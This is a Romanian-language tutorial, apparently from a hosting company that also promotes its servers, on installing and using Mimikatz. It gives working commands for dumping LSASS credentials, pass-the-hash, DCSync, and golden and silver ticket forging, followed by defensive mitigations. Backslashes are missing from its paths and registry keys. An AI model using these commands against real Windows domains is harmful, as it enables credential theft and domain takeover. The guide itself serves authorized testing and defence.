Cum să Instalați și să Utilizați Mimikatz: Un Ghid Complet pentru Profesioniștii în Securitate

Mimikatz este unul dintre cele mai cunoscute și discutate instrumente din lumea securității cibernetice. Dezvoltat inițial ca dovadă de concept pentru a demonstra vulnerabilitățile din autentificarea Windows, a devenit un instrument esențial în arsenalul testerilor de penetrare, al echipelor red team și al cercetătorilor în securitate. Acest ghid oferă o prezentare detaliată a ceea ce este Mimikatz, cine îl folosește și cum să îl instalați și să îl operați în mod responsabil într-un mediu controlat.

> Disclaimer Legal: Mimikatz trebuie utilizat doar pe sisteme pe care le dețineți sau pentru care aveți autorizație scrisă explicită de testare. Utilizarea neautorizată este ilegală și poate duce la sancțiuni penale grave. Acest ghid este destinat exclusiv în scopuri educaționale și testării legitime de securitate.

—

Ce Este Mimikatz?

Mimikatz este un instrument de securitate Windows open-source creat de cercetătorul francez în securitate Benjamin Delpy. Funcția sa principală este de a extrage credențiale de autentificare — inclusiv parole în text simplu, hash-uri de parole NTLM, coduri PIN și tichete Kerberos — direct din memoria unui sistem Windows (în special din procesul LSASS).

Deoarece Windows a stocat istoric credențialele în memorie pentru a suporta autentificarea fără întreruperi între servicii, Mimikatz a reușit să expună o slăbiciune fundamentală de design în modul în care sistemul de operare gestiona datele sensibile de autentificare. Microsoft a introdus de atunci măsuri de atenuare precum Credential Guard și grupul de securitate Protected Users, dar Mimikatz continuă să evolueze alături de aceste apărări, făcându-l un instrument de referință neprețuit pentru înțelegerea peisajului actual al amenințărilor.

Capabilități Cheie ale Mimikatz

• Extragerea parolelor în text simplu din memoria Windows (LSASS)
• Extragerea hash-urilor NTLM din baza de date SAM și Active Directory
• Extragerea și manipularea tichetelor Kerberos (atacuri Golden Ticket, Silver Ticket)
• Autentificarea Pass-the-Hash (PtH) folosind hash-uri capturate
• Atacuri Pass-the-Ticket (PtT) folosind tichete Kerberos furate
• Atacuri DCSync pentru a replica datele controlerului de domeniu fără acces direct

—

Cine Folosește Mimikatz și De Ce?

Cazuri de Utilizare Legitimă în Securitate

Mimikatz este utilizat în principal de profesioniștii în securitatea informațiilor în următoarele contexte:

• Testarea de penetrare — Simularea atacurilor reale de furt de credențiale pentru a evalua cât de bine rezistă apărările unei organizații împotriva unui adversar care a obținut acces inițial.
• Operațiuni red team — Emularea tehnicilor de amenințare persistentă avansată (APT) pentru a testa capacitățile de detectare și răspuns ale echipelor blue team și analiștilor SOC.
• Audituri de securitate — Evaluarea dacă parolele și tichetele Kerberos sunt stocate și protejate în conformitate cu cele mai bune practici de securitate.
• Instruire și conștientizare — Demonstrarea administratorilor de sistem și inginerilor exact cum funcționează în practică atacurile bazate pe credențiale, făcând amenințările abstracte tangibile și acționabile.
• Cercetarea vulnerabilităților — Identificarea de noi slăbiciuni în mecanismele de autentificare Windows înainte ca actorii malițioși să le poată exploata.

Abuz Malițios

Din păcate, Mimikatz este și un instrument preferat al actorilor de amenințare datorită eficacității sale. Cazurile de utilizare malițioasă comune includ:

• Atacuri Pass-the-Hash — Autentificarea la sisteme folosind hash-uri NTLM capturate fără a cunoaște vreodată parola originală în text simplu.
• Atacuri Pass-the-Ticket — Folosirea tichetelor Kerberos furate pentru a se da drept utilizatori legitimi în rețea.
• Persistența post-exploatare — Colectarea credențialelor după o breșă inițială pentru a se deplasa lateral printr-o rețea și a escalada privilegiile.
• Atacuri Golden Ticket — Falsificarea Ticket Granting Tickets (TGT) Kerberos pentru a obține acces persistent, aproape nelimitat la resursele domeniului.

Înțelegerea modului în care atacatorii folosesc Mimikatz este exact motivul pentru care apărătorii trebuie să fie familiarizați cu acesta. Dacă rulați un mediu de VPS Hosting sau gestionați infrastructură dedicată, cunoașterea acestor vectori de atac vă ajută să construiți apărări mai reziliente.

—

Cerințe Preliminare

Înainte de a continua, asigurați-vă că următoarele condiții sunt îndeplinite în mediul dvs. de testare autorizat:

> Bună Practică: Efectuați întotdeauna testarea Mimikatz într-o mașină virtuală izolată sau un server de laborator dedicat. Dacă aveți nevoie de un mediu sigur și izolat pentru laboratoare de testare a penetrării, luați în considerare implementarea unei instanțe de VPS Hosting cu o imagine Windows pentru a păstra testele complet separate de infrastructura de producție.

—

Pasul 1: Descărcați Mimikatz

1.1 Vizitați Depozitul Oficial GitHub

Mimikatz este menținut ca proiect open-source. Descărcați-l întotdeauna din sursa oficială pentru a evita versiunile modificate sau troianizate:

Depozit Oficial: https://github.com/gentilkiwi/mimikatz

1.2 Descărcați Cea Mai Recentă Versiune

1. Navigați la secțiunea Releases a depozitului (bara laterală dreaptă sau prin calea URL /releases).
2. Localizați cea mai recentă versiune stabilă.
3. Descărcați arhiva precompilată — de obicei denumită mimikatz_trunk.zip.

1.3 Extrageți Arhiva

1. Faceți clic dreapta pe fișierul ZIP descărcat.
2. Selectați Extrage tot…
3. Alegeți un director de destinație, de exemplu: C:SecurityToolsMimikatz

După extragere, veți găsi două subdirectoare:

• x64 — Binare pe 64 de biți (folosiți aceasta pe sistemele moderne)
• Win32 — Binare pe 32 de biți (pentru sisteme vechi)

Executabilul principal cu care veți lucra este mimikatz.exe.

—

Pasul 2: Rulați Mimikatz

2.1 Deschideți un Command Prompt cu Privilegii Ridicate

Mimikatz necesită privilegii administrative pentru a interacționa cu regiunile de memorie protejate. Pentru a lansa un shell cu privilegii ridicate:

1. Apăsați Windows + X
2. Selectați Command Prompt (Admin) sau Windows PowerShell (Admin)
3. Faceți clic pe Da la promptul UAC

2.2 Navigați la Directorul Mimikatz

cd C:SecurityToolsMimikatzx64

Verificați că mimikatz.exe este prezent în acest director:

dir mimikatz.exe

2.3 Lansați Mimikatz

mimikatz.exe

Dacă instrumentul pornește cu succes, veți vedea bannerul Mimikatz și promptul interactiv:

  .#####.   mimikatz 2.2.0 (x64) ...
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## /  ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ##  / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'         > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz #

Promptul mimikatz # confirmă că instrumentul rulează și este gata să accepte comenzi.

2.4 Activați Privilegiile de Debug

Înainte de a rula majoritatea comenzilor de extragere a credențialelor, ridicați privilegiile proprii ale Mimikatz în cadrul sesiunii:

mimikatz # privilege::debug

Rezultat așteptat:

Privilege '20' OK

Aceasta acordă Mimikatz dreptul SeDebugPrivilege, care este necesar pentru a citi memoria proceselor protejate precum LSASS.

—

Pasul 3: Comenzi de Bază Mimikatz

3.1 Extragerea Parolelor în Text Simplu din Memorie

Aceasta este cea mai cunoscută capabilitate Mimikatz. Citește credențialele stocate în cache de furnizorul de autentificare WDigest direct din memoria LSASS:

mimikatz # sekurlsa::logonpasswords

Ce returnează:

• Nume de utilizator conectați
• Nume de domenii
• Parole în text simplu (dacă stocarea în cache WDigest este activată)
• Hash-uri NTLM
• Hash-uri SHA1
• Credențiale Kerberos

> Notă: Pe Windows 8.1 și versiunile ulterioare, Microsoft a dezactivat implicit stocarea în cache a parolelor în text simplu WDigest. Cu toate acestea, atacatorii (și testerii) o pot reactiva printr-o cheie de registry, motiv pentru care acesta rămâne un caz de testare relevant.

3.2 Afișarea Parolelor Stocate (Comandă Alternativă)

mimikatz # sekurlsa::passwords

Această comandă oferă o vizualizare simplificată a credențialelor disponibile în memoria sistemului.

3.3 Extragerea Credențialelor dintr-un Fișier de Dump de Memorie

Dacă nu puteți rula Mimikatz direct pe sistemul țintă, puteți captura mai întâi un dump de memorie LSASS și îl puteți analiza offline:

Creați dump-ul folosind Task Manager:

1. Deschideți Task Manager → fila Detalii
2. Faceți clic dreapta pe lsass.exe → Creați fișier dump

Sau folosiți ProcDump (din Sysinternals):

procdump.exe -accepteula -ma lsass.exe lsass.dmp

Analizați dump-ul cu Mimikatz:

mimikatz # sekurlsa::minidump C:PathTolsass.dmp
mimikatz # sekurlsa::logonpasswords

3.4 Listarea Tichetelor Kerberos

Pentru a enumera toate tichetele Kerberos prezente în sesiunea de conectare curentă:

mimikatz # kerberos::list

Pentru a lista tichetele cu detalii complete inclusiv cheile de sesiune:

mimikatz # kerberos::list /export

Aceasta exportă fiecare tichet ca fișier .kirbi, care poate fi folosit în atacuri Pass-the-Ticket.

3.5 Exportarea Credențialelor într-un Fișier

Pentru a salva rezultatul unui dump de credențiale într-un fișier text pentru analiză ulterioară:

mimikatz # sekurlsa::logonpasswords > C:SecurityToolscredentials.txt

Rezultatul va fi scris în credentials.txt la calea specificată.

—

Pasul 4: Tehnici Avansate Mimikatz

4.1 Atac Pass-the-Hash (PtH)

Pass-the-Hash permite autentificarea la un sistem la distanță folosind un hash NTLM capturat, fără a fi nevoie de parola în text simplu:

mimikatz # sekurlsa::pth /user:Administrator /domain:TARGETDOMAIN /ntlm:<NTLM_HASH> /run:cmd.exe

Aceasta generează un nou proces cmd.exe autentificat ca utilizatorul specificat folosind hash-ul.

4.2 Atac Golden Ticket

Un Golden Ticket este un TGT Kerberos falsificat semnat cu hash-ul parolei contului KRBTGT, acordând deținătorului acces aproape nelimitat la resursele domeniului. Aceasta necesită hash-ul KRBTGT, care poate fi obținut prin DCSync:

Pasul 1 — DCSync pentru a extrage hash-ul KRBTGT:

mimikatz # lsadump::dcsync /domain:target.local /user:krbtgt

Pasul 2 — Creați Golden Ticket-ul:

mimikatz # kerberos::golden /user:Administrator /domain:target.local /sid:<DOMAIN_SID> /krbtgt:<KRBTGT_HASH> /ticket:golden.kirbi

Pasul 3 — Injectați tichetul:

mimikatz # kerberos::ptt golden.kirbi

4.3 Extragerea Hash-urilor NTLM din Baza de Date SAM

Pentru a extrage hash-urile conturilor locale din baza de date SAM (necesită privilegii SYSTEM):

mimikatz # lsadump::sam

4.4 Extragerea Secretelor din LSA

mimikatz # lsadump::secrets

Aceasta recuperează secretele LSA, care pot include credențiale ale conturilor de serviciu, credențiale de domeniu stocate în cache și alte date sensibile stocate de Autoritatea de Securitate Locală.

4.5 Atac Silver Ticket

Un Silver Ticket vizează un serviciu specific mai degrabă decât întregul domeniu. Necesită hash-ul NTLM al contului de serviciu țintă:

mimikatz # kerberos::golden /user:Administrator /domain:target.local /sid:<DOMAIN_SID> /target:<SERVICE_HOST> /service:cifs /rc4:<SERVICE_ACCOUNT_HASH> /ticket:silver.kirbi

—

Pasul 5: Măsuri Defensive de Contracarare

Înțelegerea modului în care funcționează Mimikatz reprezintă doar jumătate din ecuație. Cealaltă jumătate este să știți cum să vă apărați împotriva lui. Dacă gestionați servere Windows — fie pe Servere Dedicate sau infrastructură bazată pe cloud — următoarele măsuri de atenuare sunt critice:

5.1 Activați Credential Guard

Windows Credential Guard folosește securitatea bazată pe virtualizare (VBS) pentru a izola LSASS într-un container protejat, împiedicând Mimikatz să citească credențialele direct din memorie.

Activați prin Group Policy:

Computer Configuration → Administrative Templates → System → Device Guard → Turn On Virtualization Based Security

5.2 Dezactivați Autentificarea WDigest

Preveniți stocarea în cache a parolelor în text simplu prin dezactivarea WDigest:

HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSecurityProvidersWDigest
UseLogonCredential = 0

5.3 Adăugați Utilizatori în Grupul Protected Users

Membrii grupului de securitate Protected Users nu se pot autentifica folosind criptarea Kerberos NTLM, DES sau RC4, limitând semnificativ eficacitatea atacurilor de furt de credențiale.

5.4 Implementați Protecția LSA (RunAsPPL)

Activați Protected Process Light (PPL) pentru LSASS pentru a preveni accesul neautorizat la memorie:

HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa
RunAsPPL = 1

5.5 Monitorizați Indicatorii Mimikatz

Configurați soluția dvs. SIEM sau EDR pentru a alerta la:

• Accesul la memoria lsass.exe din procese neașteptate
• SeDebugPrivilege acordat proceselor non-sistem
• Tipare suspecte de comenzi sekurlsa, kerberos sau lsadump în jurnalele de procese
• Evenimente neobișnuite de creare a fișierelor dump LSASS (Event ID 4656, 4663)

5.6 Mențineți Sistemele Actualizate

Multe tehnici Mimikatz exploatează vulnerabilități cunoscute sau comportamente moștenite. Menținerea Windows și Active Directory complet actualizate elimină clase întregi de vectori de atac.

—

Mimikatz în Contextul Infrastructurii de Hosting Securizate

Pentru organizațiile care rulează aplicații web, API-uri sau servicii interne, riscul furtului de credențiale se extinde dincolo de stația de lucru locală. Dacă un atacator obține acces la mediul dvs. de server, instrumente precum Mimikatz pot fi folosite pentru a escalada privilegiile și a se deplasa lateral.

Alegerea unui furnizor de hosting care prioritizează securitatea la nivel de infrastructură reprezintă un strat important de apărare. Indiferent dacă aveți nevoie de Web Hosting Shared pentru proiecte mai mici sau de Servere Dedicate pentru sarcini de lucru enterprise, asigurarea că mediul dvs. de hosting include protecție DDoS, izolare de rețea și actualizări regulate de securitate reduce suprafața generală de atac.

Pentru echipele care gestionează medii Active Directory sau aplicații bazate pe Windows, asocierea infrastructurii cu Certificate SSL configurate corespunzător asigură că credențialele transmise între clienți și servere sunt criptate în tranzit — adăugând un alt strat de protecție împotriva interceptării.

—

Rezumat: Referință Comenzi Mimikatz

—

Concluzie

Mimikatz rămâne unul dintre cele mai puternice și instructive instrumente disponibile profesioniștilor în securitate cibernetică. Capacitatea sa de a expune slăbiciuni fundamentale în mecanismele de autentificare Windows a determinat îmbunătățiri semnificative în modul în care Microsoft proiectează protecția credențialelor — de la Credential Guard la Protected Users și LSA PPL. Pentru testerii de penetrare, echipele red team și cercetătorii în securitate, o înțelegere aprofundată a Mimikatz nu este opțională; este esențială.

Principiile cheie de reținut întotdeauna:

• Obțineți întotdeauna autorizație scrisă explicită înainte de a utiliza Mimikatz pe orice sistem.
• Folosiți medii izolate — mașini virtuale sau servere de laborator dedicate — pentru a evita expunerea accidentală.
• Înțelegeți apărările la fel de profund cum înțelegeți atacurile.
• Rămâneți la curent — atât Mimikatz cât și apărările Windows evoluează continuu.

Combinând cunoștințele practice despre instrumente precum Mimikatz cu o infrastructură de hosting sigură și bine configurată, echipele de securitate pot construi apărări care sunt cu adevărat testate împotriva tehnicilor de atac din lumea reală, mai degrabă decât pe baza unor presupuneri teoretice.

—

*AlexHost oferă soluții de hosting sigure și de înaltă performanță, concepute cu profesioniștii conștienți de securitate în minte. Explorați planurile noastre de VPS Hosting și Servere Dedicate pentru a construi următorul dvs. laborator securizat sau mediu de producție.*